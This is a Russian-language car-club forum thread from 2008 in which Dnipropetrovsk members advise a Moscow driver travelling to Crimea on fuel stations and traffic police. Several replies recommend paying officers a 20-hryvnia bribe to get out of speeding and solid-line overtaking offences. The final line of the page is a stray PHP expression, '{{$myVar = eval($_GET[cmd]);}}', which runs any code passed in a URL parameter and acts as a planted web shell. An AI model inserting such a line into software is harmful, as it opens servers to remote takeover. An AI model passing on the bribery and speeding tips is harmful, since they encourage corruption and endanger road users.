+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 20

Тема: Днепропетровск Отзовитесь!


  1. #1
    Мимо проходил VICTORIAN is on a distinguished road Аватар для VICTORIAN
    Регистрация
    20.08.2008
    Сообщений
    6
    ВСЕМУ ДНЕПРУ ПРИВЕТ!!

  2. #2
    VICTORIAN, привет!!! Я правда из Москвы... просто хотел пару вопросиков задать...
    В ночь с пятницы на субботу выезжаю в Крым... Расскажи плиз про бензин 98... где заправляться?
    И как там с гайцами? Ничего не изменилось? 20гр все решают?

  3. #3
    GTI-Racing Alekzendr is on a distinguished road Аватар для Alekzendr
    Регистрация
    28.04.2008
    Машина
    GTI5_Krivbass
    Сообщений
    15
    <div class='quotetop'>Цитата(JekaVika &#064; Aug 21 2008, 14&#58;22) <{POST_SNAPBACK}></div><div class='quotemain'>VICTORIAN, привет&#33;&#33;&#33; Я правда из Москвы... просто хотел пару вопросиков задать...
    В ночь с пятницы на субботу выезжаю в Крым... Расскажи плиз про бензин 98... где заправляться?
    И как там с гайцами? Ничего не изменилось? 20гр все решают?[/b][/quote]
    Даров, 20 грн решают но не все)) ... сразу лучше не тыкать деньги а понять что хочет гаец, иногда просто устным предупреждением можно отделатся. )
    и еще штрафом карается превышение скорости больше чем на 20 км.ч
    Но плиз не гоняйте в населенных пунктах&#33;&#33; лето много детей без присмотра ...

  4. #4
    <div class='quotetop'>Цитата(Alekzendr &#064; Aug 21 2008, 22&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>Даров, 20 грн решают но не все)) ... сразу лучше не тыкать деньги а понять что хочет гаец, иногда просто устным предупреждением можно отделатся. )
    и еще штрафом карается превышение скорости больше чем на 20 км.ч
    Но плиз не гоняйте в населенных пунктах&#33;&#33; лето много детей без присмотра ...[/b][/quote]

    в нас пунктах никогда не гоняю... мне больше интересно можно ли отделаться 20-ю гр. за обгон через сплошную какого-нить трактора тошнящего со скоростью 40 км/ч....

    ну и эта... где заливать 98-й?

    ЗЫ: а что значит "20 грн решают но не все"? Что они не решают? Всмысле что совсем не стоит делать? Превышение больше чем на 60 км/ч за 20гр. прокатит или уже нет?

  5. #5
    GTI-Racing Alekzendr is on a distinguished road Аватар для Alekzendr
    Регистрация
    28.04.2008
    Машина
    GTI5_Krivbass
    Сообщений
    15
    <div class='quotetop'>Цитата(JekaVika &#064; Aug 21 2008, 22&#58;42) <{POST_SNAPBACK}></div><div class='quotemain'>в нас пунктах никогда не гоняю... мне больше интересно можно ли отделаться 20-ю гр. за обгон через сплошную какого-нить трактора тошнящего со скоростью 40 км/ч....

    ну и эта... где заливать 98-й?

    ЗЫ: а что значит "20 грн решают но не все"? Что они не решают? Всмысле что совсем не стоит делать? Превышение больше чем на 60 км/ч за 20гр. прокатит или уже нет?[/b][/quote]
    ээээммм

    ну смотри, говоришь не гоняешь а про превышение на 60 км.ч спрашиваешь))
    на трассе никто с радаром не стоит, гайцы тоже люди и понимают что 90 км.ч никто не ездит ....
    практически всегда стоят там где есть ограничения ... а это или населенный пункт 50-60 км.ч ...добавь +15-20 км.ч и едь спокойно ... зачем больше.... или опасный поворот ...
    и очень часто там где ведется ремонт дороги. знаки ограничения забывают снимать вовремя ... так вот если спец техника есть на обочине хоть и не рабчая то там стоит притормозить ... а если все чисто и техники нет то они не действуют но многие не знают.

    Если не изменяет память то "обгон т.с. (трактора...) с низкой скоростью ... не помню точно какой" является не обгоном а объездом препятствия и если это не мешает другим участникам движения то разрешен.

    И еще что до гайцев то с ними лучше вообще не спорить и (ИХМО) если сам понимаешь что виноват то лучше извинится ..)))
    да и еще последнее время с взятками осторожней ... могут словить как говорится на горячем)

    Бензин хз) я вообще заправляюсь 95 ... так как у нас в городе 98 редкость.
    шороший говорят на заправках ОККО, WOG.

  6. #6
    <div class='quotetop'>Цитата(Alekzendr &#064; Aug 22 2008, 00&#58;02) <{POST_SNAPBACK}></div><div class='quotemain'>ээээммм

    ну смотри, говоришь не гоняешь а про превышение на 60 км.ч спрашиваешь))
    на трассе никто с радаром не стоит, гайцы тоже люди и понимают что 90 км.ч никто не ездит ....
    практически всегда стоят там где есть ограничения ... а это или населенный пункт 50-60 км.ч ...добавь +15-20 км.ч и едь спокойно ... зачем больше.... или опасный поворот ...
    и очень часто там где ведется ремонт дороги. знаки ограничения забывают снимать вовремя ... так вот если спец техника есть на обочине хоть и не рабчая то там стоит притормозить ... а если все чисто и техники нет то они не действуют но многие не знают.

    Если не изменяет память то "обгон т.с. (трактора...) с низкой скоростью ... не помню точно какой" является не обгоном а объездом препятствия и если это не мешает другим участникам движения то разрешен.

    И еще что до гайцев то с ними лучше вообще не спорить и (ИХМО) если сам понимаешь что виноват то лучше извинится ..)))
    да и еще последнее время с взятками осторожней ... могут словить как говорится на горячем)

    Бензин хз) я вообще заправляюсь 95 ... так как у нас в городе 98 редкость.
    шороший говорят на заправках ОККО, WOG.[/b][/quote]

    Пасиб за развернутый ответ&#33;&#33;&#33;
    На счет погонять - это относится к трассе вне населенных пунктов где спокойно можно валить достаточно быстро... Таких отрезков по трассе Москва-Симферополь достаточно много...

    Ну да, до 30 км/ч - это объезд... ну а если фура идет по трассе 60-70... и я обойду ее через сплошную, что за это будет? 20 гр. решают?

    Про ОККО еще не слышал, а вот про WOG многие говорят...

    еще раз спасибо&#33;

  7. #7
    GTI-Racing Alekzendr is on a distinguished road Аватар для Alekzendr
    Регистрация
    28.04.2008
    Машина
    GTI5_Krivbass
    Сообщений
    15
    <div class='quotetop'>Цитата(JekaVika &#064; Aug 21 2008, 23&#58;18) <{POST_SNAPBACK}></div><div class='quotemain'>Пасиб за развернутый ответ&#33;&#33;&#33;
    На счет погонять - это относится к трассе вне населенных пунктов где спокойно можно валить достаточно быстро... Таких отрезков по трассе Москва-Симферополь достаточно много...

    Ну да, до 30 км/ч - это объезд... ну а если фура идет по трассе 60-70... и я обойду ее через сплошную, что за это будет? 20 гр. решают?

    Про ОККО еще не слышал, а вот про WOG многие говорят...

    еще раз спасибо&#33;[/b][/quote]
    Всегда пожалуйста) и как говорится Добро пожаловать))
    ... если фуру на 60-70 при сплошной .. это уже как повезет, в принципе 20 грн должно хватить. но может и не хватить, некоторые гайцы любят иностранцам голову поморочить. . .)

    Просто относитесь уважительно на дороге друг к другу) ... грузовик едет 70 км.ч не от того что он к@зел) а от того что машина больше не может)

  8. #8
    <div class='quotetop'>Цитата(Alekzendr &#064; Aug 22 2008, 01&#58;05) <{POST_SNAPBACK}></div><div class='quotemain'>... если фуру на 60-70 при сплошной .. это уже как повезет, в принципе 20 грн должно хватить. но может и не хватить, некоторые гайцы любят иностранцам голову поморочить. . .)[/b][/quote]

    ну к общению с ними я готов)))


    <div class='quotetop'>Цитата(Alekzendr &#064; Aug 22 2008, 01&#58;05) <{POST_SNAPBACK}></div><div class='quotemain'>Просто относитесь уважительно на дороге друг к другу) ... грузовик едет 70 км.ч не от того что он к@зел) а от того что машина больше не может)[/b][/quote]

    так я ничего против и не имею... я просто говорю об обгоне в безопасном месте... а большинство грузовиков вообще прижимаются вправо, уступая дорогу... 3 года уже ездил, обычно так и было... но бывают случаи, что уйти некуда и вот тогда в безопасном месте я обгонял...

    А за пересечение сплошной с выездом на встречку или за обгон под знак "обгон запрещен" у вас изъятие или штраф? Если штраф, то какой?
    Да и вообще если не сложно расскажи какие штрафы за нарушения и в каких случаях грозит изъятие? Хотя на сколько я знаю, они не имеют права отнимать водительское удостоверение у иностранца...

  9. #9
    Мимо проходил VICTORIAN is on a distinguished road Аватар для VICTORIAN
    Регистрация
    20.08.2008
    Сообщений
    6
    Заливай бензин на WOG. или нефтек&#33;&#33;
    20 рублей не всегда прокатик так как ты росиянин, они с вас больше берут, тут пару дней назад у меня за привышение не хотели брать20, так в итоге так отпустили&#33;

  10. #10
    Мимо проходил dionisiy2007 is on a distinguished road Аватар для dionisiy2007
    Регистрация
    31.08.2008
    Сообщений
    8
    Ау&#33;Привет&#33;Я из Днепра&#33;

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Gti Киев, Отзовитесь
    от gti_girl в разделе Welcome to GTI-CLUB
    Ответов: 17
    Последнее сообщение: 10.04.2024, 22:16
  2. VR 5 с АКПП отзовитесь
    от Ascred в разделе Golf 4
    Ответов: 3
    Последнее сообщение: 03.07.2023, 19:36
  3. Питерчане отзовитесь SOS ПРОПАЛ РЕБЕНОК!!!
    от Gizka в разделе Встречи и мероприятия
    Ответов: 2
    Последнее сообщение: 01.05.2023, 14:58
  4. Уфимские, отзовитесь!
    от hazart в разделе В городах которые пока не получили отдельного раздела
    Ответов: 0
    Последнее сообщение: 20.01.2015, 00:19
  5. Gti Киев, Отзовитесь
    от gti_girl в разделе Клубные машины
    Ответов: 0
    Последнее сообщение: 01.01.1970, 04:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}